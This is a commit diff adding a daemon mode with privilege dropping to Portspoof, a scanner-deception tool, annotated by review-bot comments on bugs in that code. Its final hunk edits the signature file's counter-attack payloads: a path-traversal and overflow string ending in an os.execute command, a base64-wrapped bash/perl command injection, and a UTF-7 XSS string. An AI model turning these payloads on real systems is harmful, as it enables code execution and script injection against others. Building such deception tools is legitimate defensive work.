ready for release
parent
1791fe4e2b
commit
9765f738db
@ -43,6 +43,9 @@ Configuration::Configuration()
|
||||
signaturefile = std::string(SIGNATURE_FILE);
|
||||
logfile = std::string(LOG_FILE);
|
||||
bind_ip=std::string();
|
||||
username=std::string(DAEMON_USER);
|
||||
group=std::string(DAEMON_USER);
|
||||
|
||||
port=DEFAULT_PORT;
|
||||
opts=0;
|
||||
nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);
|
||||
@ -63,6 +66,7 @@ void Configuration::usage(void)
|
||||
"Portspoof - service signature emulator / exploitation framework.\n\n"
|
||||
"-i ip : Bind to a particular IP address\n"
|
||||
"-p port : Bind to a particular PORT number\n"
|
||||
"-D run as daemon process\n"
|
||||
"-s file_path : Portspoof service signature regex. file\n"
|
||||
"-c file_path : Portspoof configuration file\n"
|
||||
"-l file_path : Log port scanning alerts to a file\n"
|
||||
@ -84,7 +88,7 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
int ch;
|
||||
extern char *__progname;
|
||||
|
||||
while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
|
||||
while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123D")) != -1) {
|
||||
switch (ch) {
|
||||
case 'i':
|
||||
this->bind_ip = std::string(optarg);
|
||||
@ -112,6 +116,9 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
this->opts[OPT_SYSLOG_DIS]=1;
|
||||
fprintf(stdout,"-> Syslog logging disabled.\n");
|
||||
break;
|
||||
case 'D':
|
||||
this->opts[OPT_RUN_AS_D]=1;
|
||||
break;
|
||||
case 'l':
|
||||
this->opts[OPT_LOG_FILE]=1;
|
||||
this->logfile = std::string(optarg);
|
||||
@ -214,10 +221,31 @@ unsigned short int Configuration::getPort()
|
||||
|
||||
int Configuration::getThreadNr()
|
||||
{
|
||||
|
||||
return this->thread_number;
|
||||
}
|
||||
|
||||
|
||||
int Configuration::getUserid()
|
||||
{
|
||||
struct passwd *pwd = getpwnam(this->username.c_str());
|
||||
if(pwd) return pwd->pw_uid;
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
|
||||
int Configuration::getGroupid()
|
||||
{
|
||||
struct group *grp = getgrnam(this->group.c_str());
|
||||
if(grp) return grp->gr_gid;
|
||||
|
||||
return -1;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
std::vector<char> Configuration::mapPort2Signature(unsigned short port)
|
||||
{
|
||||
|
||||
|
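Review bot: getUserid() and getGroupid() signal a failed getpwnam()/getgrnam() lookup with -1, but the only caller this commit adds (Server::daemonize) passes the result straight to setgid()/setuid(), where -1 is converted to an unsigned gid/uid on the usual platforms, so a mistyped user name surfaces as a misleading "Unable to drop privileges" error rather than "unknown user". Either have the caller reject a negative value first, or make the contract explicit on the getters, e.g. `// Returns the uid of the configured username, or -1 if getpwnam() finds no such user; callers must check before passing it to setuid().` with the matching line on getGroupid(). Separately, the constructor hunk initialises `group` from DAEMON_USER although this commit adds a DAEMON_GROUP macro in the header; `group=std::string(DAEMON_GROUP);` looks like the intended line. mapPort2Signature's body continues outside the hunk.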
@ -44,6 +44,10 @@
|
||||
#define LOG_FILE "portspoof.log"
|
||||
#define CONF_FILE "portspoof.conf"
|
||||
#define SIGNATURE_FILE "portspoof_signatures"
|
||||
|
||||
#define DAEMON_USER "daemon"
|
||||
#define DAEMON_GROUP "daemon"
|
||||
|
||||
#define OPT_FUZZ_WORDLIST 1
|
||||
#define OPT_IP 2
|
||||
#define OPT_PORT 3
|
||||
@ -56,14 +60,14 @@
|
||||
#define OPT_FUZZ_INTERNAL 10
|
||||
#define OPT_NOT_NMAP_SCANNER 11
|
||||
#define OPT_FUZZ_RANDOM 12
|
||||
#define OPT_RUN_AS_D 13
|
||||
|
||||
|
||||
#define MAX_PORTS 65535
|
||||
|
||||
|
||||
#include <string>
|
||||
#include <stdio.h>
|
||||
#include <ctype.h>
|
||||
#include <pcap.h>
|
||||
#include <map>
|
||||
#include <vector>
|
||||
#include <sstream>
|
||||
@ -72,6 +76,11 @@
|
||||
#include <iostream>
|
||||
#include <ctime>
|
||||
#include <bitset>
|
||||
#include <sys/types.h>
|
||||
#include <stdio.h>
|
||||
#include <pwd.h>
|
||||
#include <grp.h>
|
||||
#include <unistd.h>
|
||||
|
||||
|
||||
#include "Utils.h"
|
||||
@ -98,6 +107,9 @@ class Configuration {
|
||||
std::string signaturefile;
|
||||
std::string logfile;
|
||||
std::string bind_ip;
|
||||
std::string username;
|
||||
std::string group;
|
||||
|
||||
unsigned short int port;
|
||||
int thread_number;
|
||||
bool fuzzing_mode;
|
||||
@ -127,7 +139,8 @@ class Configuration {
|
||||
bool getConfigValue(int value);
|
||||
unsigned short int getPort();
|
||||
int getThreadNr();
|
||||
|
||||
int getGroupid();
|
||||
int getUserid();
|
||||
};
|
||||
|
||||
|
||||
|
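Review bot: OPT_RUN_AS_D is 13, one past the previous highest option index (OPT_FUZZ_RANDOM 12), and Configuration.cpp indexes `opts[OPT_RUN_AS_D]`; the declaration of `opts` is not in this hunk, and `opts=0` plus `<bitset>` suggest a fixed-size std::bitset, so if it was sized for the old options index 13 is out of range and undefined behaviour — confirm it has at least 14 bits. The new `#include <stdio.h>` duplicates the one already a few lines above in the same include list and can be dropped. The new getters wrap uid_t/gid_t in `int` and use -1 as a sentinel; a comment such as `int getUserid();   // uid of username, or -1 if the lookup fails` would make that visible to callers.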
@ -42,7 +42,6 @@
|
||||
#include <string>
|
||||
#include <stdio.h>
|
||||
#include <ctype.h>
|
||||
#include <pcap.h>
|
||||
#include <map>
|
||||
#include <vector>
|
||||
#include <sstream>
|
||||
|
@ -174,3 +174,87 @@ int Server::choose_thread()
|
||||
|
||||
return min;
|
||||
}
|
||||
|
||||
|
||||
|
||||
void Server::daemonize()
|
||||
{
|
||||
|
||||
const string &dir = "/";
|
||||
const std::string &stdinfile = "/dev/null";
|
||||
const std::string &stdoutfile = "/dev/null";
|
||||
const std::string &stderrfile = "/dev/null";
|
||||
|
||||
|
||||
umask(0);
|
||||
/*
|
||||
rlimit rl;
|
||||
if (getrlimit(RLIMIT_NOFILE, &rl) < 0)
|
||||
{
|
||||
throw std::runtime_error(strerror(errno));
|
||||
}
|
||||
|
||||
|
||||
|
||||
*/
|
||||
|
||||
pid_t pid;
|
||||
if ((pid = fork()) < 0)
|
||||
{
|
||||
throw std::runtime_error(strerror(errno));
|
||||
} else if (pid != 0) { //parent
|
||||
exit(0);
|
||||
}
|
||||
|
||||
setsid();
|
||||
|
||||
if (!dir.empty() && chdir(dir.c_str()) < 0)
|
||||
{
|
||||
throw std::runtime_error(strerror(errno));
|
||||
}
|
||||
|
||||
|
||||
if (setgid(this->configuration->getGroupid()) != 0)
|
||||
{
|
||||
fprintf(stdout,"setgid: Unable to drop group privileges: %s", strerror(errno));
|
||||
fflush(stdout);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
||||
if (setuid(this->configuration->getUserid()) != 0)
|
||||
{
|
||||
fprintf(stdout,"setuid: Unable to drop user privileges: %s", strerror(errno));
|
||||
fflush(stdout);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
|
||||
/*
|
||||
if (rl.rlim_max == RLIM_INFINITY)
|
||||
{
|
||||
rl.rlim_max = 1024;
|
||||
}
|
||||
|
||||
for (unsigned int i = 0; i < rl.rlim_max; i++)
|
||||
{
|
||||
close(i);
|
||||
}
|
||||
|
||||
*/
|
||||
|
||||
int fd0 = open(stdinfile.c_str(), O_RDONLY);
|
||||
int fd1 = open(stdoutfile.c_str(),
|
||||
O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
|
||||
int fd2 = open(stderrfile.c_str(),
|
||||
O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
|
||||
|
||||
/*
|
||||
if (fd0 != STDIN_FILENO || fd1 != STDOUT_FILENO || fd2 != STDERR_FILENO)
|
||||
{
|
||||
throw runtime_error("new standard file descriptors were not opened as expected");
|
||||
}
|
||||
*/
|
||||
|
||||
|
||||
}
|
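Review bot: The three open() calls at the end of daemonize() never reach the standard descriptors: nothing closes or dup2()s over 0/1/2 (the close loop and the fd0/fd1/fd2 sanity check are both commented out), so the daemon keeps the terminal's stdin/stdout/stderr and merely leaks three descriptors to /dev/null. The privilege drop is also incomplete: setgid()/setuid() leave the supplementary groups inherited from the starting user in place, so a `setgroups(0, NULL)` (declared in <grp.h>, which Configuration.h now pulls in — confirm Server.cpp sees it) should precede setgid(). setsid() and the open() return values are unchecked, and `const string &dir` relies on a using-directive while the next three lines spell `std::string`. The sketch below keeps the existing error-reporting style; the fprintf-to-stdout diagnostics must stay before the redirection or they vanish into /dev/null.
```cpp
void Server::daemonize()
{
	/* … unchanged: dir/stdinfile/stdoutfile/stderrfile, umask(0), fork(), setsid(), chdir() … */

	/* Drop supplementary groups first: setgid()/setuid() alone leave the
	 * starting user's group list in place. */
	if (setgroups(0, NULL) != 0)
	{
		fprintf(stdout,"setgroups: Unable to drop supplementary groups: %s", strerror(errno));
		fflush(stdout);
		exit(-1);
	}

	/* … unchanged: setgid()/setuid() checks … */

	int fd0 = open(stdinfile.c_str(), O_RDONLY);
	int fd1 = open(stdoutfile.c_str(), O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
	int fd2 = open(stderrfile.c_str(), O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
	if (fd0 < 0 || fd1 < 0 || fd2 < 0)
	{
		throw std::runtime_error(strerror(errno));
	}

	/* Only now do the descriptors replace the inherited stdio; the
	 * open() calls alone leave 0/1/2 pointing at the terminal. */
	if (dup2(fd0, STDIN_FILENO) < 0 || dup2(fd1, STDOUT_FILENO) < 0 || dup2(fd2, STDERR_FILENO) < 0)
	{
		throw std::runtime_error(strerror(errno));
	}
	if (fd0 > STDERR_FILENO) close(fd0);
	if (fd1 > STDERR_FILENO) close(fd1);
	if (fd2 > STDERR_FILENO) close(fd2);
}
```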
@ -42,6 +42,12 @@
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdio.h>
|
||||
#include <pwd.h>
|
||||
#include <unistd.h>
|
||||
#include <stdexcept>
|
||||
#include <sys/resource.h>
|
||||
|
||||
#include <time.h>
|
||||
#include "Threads.h"
|
||||
@ -66,6 +72,7 @@ class Server{
|
||||
Server(Configuration* configuration);
|
||||
int choose_thread();
|
||||
bool run();
|
||||
void daemonize();
|
||||
};
|
||||
|
||||
#endif
|
||||
|
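Review bot: daemonize() is added to the class with no documentation, and it is also where privileges are dropped, which callers should know; a line such as `void daemonize();  // fork to the background, setsid(), chdir("/"), then drop to the configured group/user (exit(-1) on failure); the parent exits; call before run()` would cover it. The include hunk adds a second `#include <sys/types.h>` directly below the existing one. Server.cpp's daemonize() also uses open(), O_RDONLY/O_CREAT/O_APPEND and S_IRUSR/S_IWUSR, which come from <fcntl.h> and <sys/stat.h>; neither is in this hunk, so they must be arriving transitively — worth including explicitly.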
@ -55,6 +55,10 @@ int main(int argc, char **argv)
|
||||
exit(1);
|
||||
|
||||
server = new Server(configuration);
|
||||
|
||||
if(configuration->getConfigValue(OPT_RUN_AS_D))
|
||||
server->daemonize();
|
||||
|
||||
server->run();
|
||||
|
||||
return 0;
|
||||
|
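Review bot: Privileges are dropped only on the -D path: the setgid()/setuid() calls live inside Server::daemonize(), so a foreground run without -D keeps whatever user it was started as, including root, for the whole of server->run(). Splitting the drop out of daemonize() and calling it on both paths before run() keeps the two modes consistent. daemonize() also throws std::runtime_error on fork()/chdir() failure and the visible part of main has no handler, so such a failure ends in an unhandled exception rather than a message. main() starts outside the hunk.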
@ -33,6 +33,7 @@
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
// TODO: TO BE ENTIRELY REWRITTEN!
|
||||
|
||||
#include "revregex.h"
|
||||
|
||||
|
@ -1,13 +1,12 @@
|
||||
#!/bin/sh
|
||||
# Starts and stops Portspoof
|
||||
# Starts and stops Portspoof daemon
|
||||
#
|
||||
|
||||
|
||||
case "$1" in
|
||||
start)
|
||||
|
||||
if ! pidof portspoof >/dev/null; then
|
||||
/usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures
|
||||
/usr/local/bin/portspoof -D -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures
|
||||
echo "Starting Portspoof..."
|
||||
else
|
||||
echo "Portspoof already running.."
|
||||
|
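Review bot: With -D the launched process fork()s and the parent exit(0)s immediately, so the `echo "Starting Portspoof..."` after it, and the script's exit status, say nothing about whether the child actually bound its port or survived the privilege drop (Server::daemonize exit(-1)s on setgid/setuid failure). Re-checking `pidof portspoof` after a short pause, or having the daemon write a pidfile the script tests, would let `start` report a real failure. The case statement continues past the hunk.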
@ -99,7 +99,7 @@
|
||||
80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22 value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"
|
||||
|
||||
#OS cmd injection payload for bash: $(cat output) and `cat output` injections
|
||||
9090 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV[0];~s/SPACE/\t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));"
|
||||
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
|
||||
|
||||
#McAffe SuperScan UTF7 XSS payload
|
||||
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"
|
||||
|